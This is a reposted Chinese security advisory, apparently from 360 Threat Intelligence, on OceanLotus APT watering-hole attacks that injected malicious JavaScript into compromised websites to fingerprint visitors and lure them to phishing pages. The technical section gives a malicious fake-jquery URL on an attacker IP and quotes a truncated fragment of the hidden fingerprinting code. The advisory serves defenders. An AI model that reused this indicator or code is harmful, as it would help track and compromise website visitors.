黑基网 首页 资讯 安全圈 查看内容

海莲花(OceanLotus)APT团伙新活动通告

2017-11-9 21:37| 投稿: xiaotiger |来自: 互联网

摘要: 2017 年11月6日,国外安全公司 Volexity 发布了一篇关于疑似海莲花 APT 团伙新活动的 报告,该报告指出攻击团伙攻击了与政府、军事、人权、民主、媒体和国家石油勘探等有关 的个人和组织的 100 多个网站。通过针对性 ...

文档信息


通告背景


2017 年 11 月 6 日,国外安全公司发布了一篇据称海莲花 APT 团伙新活动的报告,360 威胁情报中心对其进行了分析和影响面评估,提供处置建议。

事件概要


事件描述


2017 年 11 月 6 日,国外安全公司 Volexity 发布了一篇关于疑似海莲花 APT 团伙新活动的 报告,该报告指出攻击团伙攻击了与政府、军事、人权、民主、媒体和国家石油勘探等有关 的个人和组织的 100 多个网站。通过针对性的 JavaScript 脚本进行信息收集,修改网页视 图,配合社会工程学诱导受害人点击安装恶意软件或者登陆钓鱼页面,以进行下一步的攻击渗透。

事件时间线


2017 年 11 月 6 日 Volexity 公司发布了据称海莲花新活动的报告。

2017 年 11 月 7 日 360 威胁情报中心发现确认部分攻击并作出响应。

影响面和危害分析


攻击者团伙入侵目标用户可能访问的网站,不仅破坏网站的安全性,还会收集所访问用户的 系统信息。如果确认感兴趣的目标,则会执行进一步的钓鱼攻击获取敏感账号信息或尝试植 入恶意程序进行秘密控制。

目前 360 威胁情报中心确认部分网站受到了影响,用户特别是政府及大企业有必要结合附 件提供的 IOC 信息对自身系统进行检查处理。

处置建议


1. 网站管理员检查自己网站页面是否被植入了恶意链接,如发现,清理被控制的网站中嵌 入的恶意代码,并排查内部网络的用户是否被植入了恶意程序。

2. 电脑安装防病毒安全软件,确认规则升级到最新。

技术分析


通过水坑攻击将恶意 JavaScript 代码植入到合法网站,收集用户浏览器指纹信息,修改网 页视图诱骗用户登陆钓鱼页面、安装下载恶意软件。

探针一

从样本 JavaScript 出发

//45.32.105.45/ajax/libs/jquery/2.1.3/jquery.min.js?s=1&v=86462

jquery 的最下面有个 eval

核心获取传输数据部分如下:


var browser_hash = 'b0da8bd67938a5cf22e0-37cea33014-iGJHVcEXbp';
var data = { 'browserhash': browserhash, 'type': 'Extended Browser Info', 'action': '
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

发表评论

最新评论

引用 游客 2017-11-9 22:55
谁给我一个邀请码

查看全部评论(1)


新出炉

返回顶部